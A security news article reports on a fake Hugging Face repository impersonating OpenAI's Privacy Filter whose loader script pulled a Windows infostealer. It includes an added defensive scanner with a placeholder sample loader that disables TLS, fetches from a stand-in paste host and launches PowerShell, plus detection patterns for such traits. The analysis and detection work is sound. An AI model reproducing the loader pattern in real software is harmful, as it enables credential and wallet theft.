Fake OpenAI privacy filter repository hit top of Hugging Face trending list

A malicious Hugging Face repository that impersonated OpenAI’s Privacy Filter model reached the platform’s trending list before it was disabled, with HiddenLayer saying the page drew about 244,000 downloads and 667 likes in 18 hours.

KEY FACTS

  • Impersonation: The project copied the description from OpenAI’s Privacy Filter release to look legitimate.
  • Payload: A loader file fetched and executed a Rust-based information stealer on Windows systems.
  • Delivery: The code used a JSON paste service and remote servers to pull second-stage content.
  • Targets: The final malware stole screenshots, browser data, Discord data, wallet files and seed phrases.

A technical analysis by HiddenLayer Research said the repository typosquatted the legitimate model page and included a loader script named loader.py that triggered the attack chain. Hugging Face has since disabled access to the malicious model.

The report said the loader disabled SSL verification, decoded a Base64 URL from JSON Keeper and passed a command to PowerShell. That step downloaded a batch script from a remote domain, elevated privileges through a UAC prompt, set Microsoft Defender exclusions and launched the next stage.
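As an added, defender-side example (written for this page, not HiddenLayer's or Hugging Face's own tooling), the Python script below triages a model repository before any of its files are trusted. It does two things the report's findings suggest: it flags a namespace that closely resembles a known organisation but is not that organisation, and it statically scans bundled Python files for the loader traits described above (TLS verification disabled, Base64 decoding of a fetched value, a paste-service URL, and a command handed to PowerShell). The indicator names, the scoring thresholds, the short organisation allowlist, the paste-host substrings and both sample files are constructed assumptions; the sample "loader" contains only placeholders and is not code from the incident.

```python
"""Static triage of a Hugging Face-style model repository (added example).

Assumptions (not from the report): indicator names, scoring, the allowlist
of organisations, the paste-host substrings, and the two sample files.
"""
import ast
import difflib

KNOWN_ORGS = ("openai", "meta-llama", "google", "microsoft")  # assumption: short allowlist
PASTE_HOSTS = ("jsonkeeper", "pastebin")  # assumption: substrings of paste services to flag


def _call_name(node):
    """Return the dotted name of a call target, e.g. 'requests.get'."""
    parts, func = [], node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_source(source):
    """Return the sorted list of indicator names found in one Python file."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            # requests.get(..., verify=False) and similar
            if any(kw.arg == "verify" and isinstance(kw.value, ast.Constant)
                   and kw.value.value is False for kw in node.keywords):
                found.add("tls_verify_disabled")
            if name.endswith("b64decode"):
                found.add("base64_decode")
            # any subprocess/os call whose literal arguments mention PowerShell
            if name.startswith("subprocess.") or name in ("os.system", "os.popen"):
                for arg in ast.walk(node):
                    if (isinstance(arg, ast.Constant) and isinstance(arg.value, str)
                            and "powershell" in arg.value.lower()):
                        found.add("powershell_exec")
        elif isinstance(node, ast.Assign):
            # ssl._create_default_https_context = ssl._create_unverified_context
            for target in node.targets:
                if isinstance(target, ast.Attribute) and target.attr == "_create_default_https_context":
                    found.add("tls_verify_disabled")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(host in node.value.lower() for host in PASTE_HOSTS):
                found.add("paste_service_url")
    return sorted(found)


def lookalike_org(repo_id, cutoff=0.8):
    """Return the known org the repo namespace resembles but does not equal, else None."""
    org = repo_id.split("/", 1)[0].lower()
    if org in KNOWN_ORGS:
        return None
    match = difflib.get_close_matches(org, KNOWN_ORGS, n=1, cutoff=cutoff)
    return match[0] if match else None


def triage(repo_id, sources):
    """Combine the namespace check and the per-file scan into one verdict."""
    indicators = set()
    for src in sources:
        indicators.update(scan_source(src))
    lookalike = lookalike_org(repo_id)
    score = len(indicators) + (2 if lookalike else 0)  # assumption: lookalike name weighs 2
    verdict = "block" if score >= 3 else ("review" if score else "pass")
    return {"lookalike_of": lookalike, "indicators": sorted(indicators),
            "score": score, "verdict": verdict}


# Constructed sample inputs (placeholders only; not the real loader or repo ids).
SAMPLE_LOADER = '''
import base64, ssl, subprocess, requests
ssl._create_default_https_context = ssl._create_unverified_context
cfg = requests.get("https://jsonkeeper.example/b/PLACEHOLDER", verify=False).json()
target = base64.b64decode(cfg["u"]).decode()
subprocess.Popen(["powershell", "-Command", "PLACEHOLDER"])
'''
SAMPLE_BENIGN = '''
from transformers import AutoModel
model = AutoModel.from_pretrained("ORG/MODEL-PLACEHOLDER")
'''

if __name__ == "__main__":
    print(triage("0penai/privacy-filter", [SAMPLE_LOADER]))
    print(triage("someone/mymodel", [SAMPLE_BENIGN]))
```

The scan is deliberately conservative: a single indicator (say, one `b64decode` call) only routes a repository to human review, while the combination of a lookalike namespace with several loader traits is enough to block it. Running the scan on files from a model card before they are executed is the check a registry or an internal mirror can apply automatically; it does not replace inspecting what the loader fetches at run time.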

After a scheduled task ran the executable, the task removed itself and did not survive a reboot. The malware also checked for debuggers, sandboxes and virtual machines, and tried to disable AMSI and ETW before sending stolen data in JSON format to another domain.

The same analysis identified six more Hugging Face repositories that used a similar Python loader. It also linked the infrastructure to a Windows executable that connected to a command and control server previously associated with ValleyRAT, a modular remote access trojan tied to the Silver Fox group.

WHY IT MATTERS

The case shows how attackers can use trusted open source platforms to lend credibility to malware and reach large numbers of potential victims. It also underscores the risk of supply chain abuse in AI and developer ecosystems, where lookalike projects can hide malicious code.